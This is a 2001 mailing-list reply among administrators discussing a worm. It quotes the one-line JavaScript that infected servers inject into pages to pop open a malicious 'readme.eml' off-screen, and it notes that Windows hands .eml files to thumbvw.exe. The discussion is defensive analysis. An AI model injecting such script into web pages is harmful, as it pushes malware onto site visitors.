Re: [unisog] Some more details on the worm

From: Jeffrey Altman (jaltmanat_private)
Date: Tue Sep 18 2001 - 17:54:51 PDT

    .eml is listed in the Registry as "Microsoft Internet Mail Message"
    with Content Type = "message/rfc822".  On my Windows 2000 system this
    will result in a program called

      \WINDOWS\system32\thumbvw.exe

    being executed using the Apartment threading model.

    - Jeff

    > When pages are served up by an infected server, it looks as though
    > readme.eml is 'attached' to them.  The server attempts to get the client to
    > open them through the following bit of code (from the .dll file):
    >
    > <script language="JavaScript">window.open("readme.eml", null,
    > "resizable=no,top=6000,left=6000")</script>
    >
    > According to Slashdot, this causes the file to be automatically opened and
    > executed by the client.  I haven't been able to confirm or deny that (but if
    > someone can, please do).
    >
    > Regards,
    > Matt
    >

    > --
    > Matt Davis, MCP
    > Intermediate Client Server Business Support Analyst
    > COUNTRY(SM) Insurance & Financial Services
    > 309-821-6288
    > mailto:matt.davisat_private

     Jeffrey Altman * Sr.Software Designer      C-Kermit 8.0 Beta available
     The Kermit Project @ Columbia University   includes Secure Telnet and FTP
     http://www.kermit-project.org/             using Kerberos, SRP, and
     kermit-support@kermit-project.org          OpenSSL.  SSH soon to follow.